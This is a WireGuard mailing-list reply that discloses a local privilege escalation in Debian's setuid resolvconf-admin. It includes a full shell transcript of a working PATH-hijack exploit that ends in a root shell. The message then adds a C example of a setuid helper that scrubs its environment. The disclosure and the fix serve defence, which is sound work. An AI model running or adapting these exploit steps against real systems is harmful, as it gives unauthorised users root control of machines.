From mboxrd@z Thu Jan 1 00:00:00 1970
Return-Path: Jason@zx2c4.com
From: "Jason A. Donenfeld"
Date: Sun, 29 Oct 2017 23:06:31 +0100
Subject: Re: Fixing wg-quick's DNS= directive with a hatchet
To: Daniel Kahn Gillmor
Cc: WireGuard mailing list
In-Reply-To: <87ineze3x2.fsf@fifthhorseman.net>
References: <3a761178-19bc-1d01-b6a8-9fb801312d47@solidadmin.com> <44ac12fe-685b-730e-8afd-e4081daf038d@solidadmin.com> <92b6b9c5-b07c-52fa-a72a-0fc2dcc253bc@solidadmin.com> <87she4fdol.fsf@fifthhorseman.net> <87ineze3x2.fsf@fifthhorseman.net>
List-Id: Development discussion of WireGuard
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"

On Sat, Oct 28, 2017 at 4:35 PM, Daniel Kahn Gillmor wrote:
> I actually shipped the resolvconf-admin package in debian to provide
> some kind of filtering interface to avoid total garbage from the network
> getting accidentally passed through to arbitrary resolvconf plugins.

By the way, the program you wrote introduces a trivial local privilege
escalation vulnerability into Debian, since not all available providers
of the resolvconf binary set PATH themselves.
Always clear environment variables yourself before exec'ing anything in
an suid executable. Here's an exploit:

unpriv@scw-968260:~$ id
uid=1000(unpriv) gid=1000(unpriv) groups=1000(unpriv),114(resolvconf-admins)
unpriv@scw-968260:~$ stat /usr/bin/resolvconf-admin
  File: /usr/bin/resolvconf-admin
  Size: 24736      Blocks: 56         IO Block: 4096   regular file
Device: fd00h/64768d   Inode: 2897743     Links: 1
Access: (4754/-rwsr-xr--)  Uid: (    0/    root)   Gid: (  114/resolvconf-admins)
Access: 2017-10-29 21:56:25.709185001 +0000
Modify: 2017-10-29 21:55:04.529185001 +0000
Change: 2017-10-29 21:55:41.449185001 +0000
 Birth: -
unpriv@scw-968260:~$ echo 'main() { setuid(0); setgid(0); execl("/bin/sh", 0); }' > a.c && gcc -o rootshell a.c
unpriv@scw-968260:~$ echo "main() { chown(\"$PWD/rootshell\", 0, 0); chmod(\"$PWD/rootshell\", 04755); }" > a.c && gcc -o mkdir a.c
unpriv@scw-968260:~$ export PATH="$PWD:$PATH"
unpriv@scw-968260:~$ resolvconf-admin add eth0 8.8.8.8
Cannot write to /run/resolvconf/lock
unpriv@scw-968260:~$ ./rootshell
# id
uid=0(root) gid=0(root) groups=0(root),114(resolvconf-admins),1000(unpriv)
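The defensive pattern the message calls for, as an added example that is not code from this post, from the Debian resolvconf-admin package or from any resolvconf provider: a setuid helper constructs its own minimal environment (a fixed PATH, plus the caller's TERM only if it passes a character whitelist), drops everything else, and exec's the child by absolute path with execve() so no PATH lookup happens in the privileged process. The exec target (/bin/echo) and the pass-through list (TERM only) are assumptions chosen for the demonstration; a real helper would exec the resolvconf binary it wraps.

```c
/* Added example, not code from the mailing-list post or from the Debian
 * resolvconf-admin package: a setuid helper that builds its own
 * environment and exec's by absolute path, so a caller's PATH, LD_*,
 * IFS or similar variables never reach the privileged child.
 * The exec target (/bin/echo) and the pass-through list (TERM only)
 * are assumptions chosen for the demonstration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Trusted search path the child receives, regardless of the caller's. */
#define SAFE_PATH "PATH=/usr/sbin:/usr/bin:/sbin:/bin"
#define MAX_ENV 8

/* Accept only short values made of [A-Za-z0-9._-]; rejects shell
 * metacharacters, spaces and anything a downstream script might
 * interpret. Returns 1 if safe, 0 otherwise. */
int env_value_is_safe(const char *v)
{
    size_t len = strlen(v);
    if (len == 0 || len > 63)
        return 0;
    for (; *v; v++) {
        char c = *v;
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-' || c == '_' || c == '.'))
            return 0;
    }
    return 1;
}

/* Fill out[] (caller provides room for max entries plus a terminating
 * NULL) with a fixed PATH and, if present and well-formed, the caller's
 * TERM. Everything else in caller_env (LD_PRELOAD, IFS, a user-supplied
 * PATH, ...) is dropped. Returns the number of entries written. */
size_t build_safe_env(char *const caller_env[], char *out[], size_t max)
{
    size_t n = 0;
    if (max < 1) {
        out[0] = NULL;
        return 0;
    }
    out[n++] = (char *)SAFE_PATH;
    for (size_t i = 0; caller_env && caller_env[i] && n < max; i++) {
        const char *e = caller_env[i];
        if (strncmp(e, "TERM=", 5) == 0 && env_value_is_safe(e + 5))
            out[n++] = caller_env[i];
    }
    out[n] = NULL;
    return n;
}

int main(void)
{
    char *env[MAX_ENV + 1];
    build_safe_env(environ, env, MAX_ENV);

    /* Absolute path, never a bare name: a PATH lookup in the child is
     * exactly what the exploit above relies on. /bin/echo stands in for
     * the real helper a wrapper like this would run. */
    char *const argv[] = {"echo", "child ran with scrubbed environment", NULL};
    execve("/bin/echo", argv, env);
    perror("execve");
    return 1;
}
```

Two points in the design: the dynamic loader already ignores LD_PRELOAD and friends for a setuid binary, but it does nothing about PATH, so a helper that later calls execlp()/execvp() or system() hands the lookup back to the caller's PATH; and passing an explicit envp to execve() is more robust than clearenv() followed by setenv(), because nothing inherited can survive by accident.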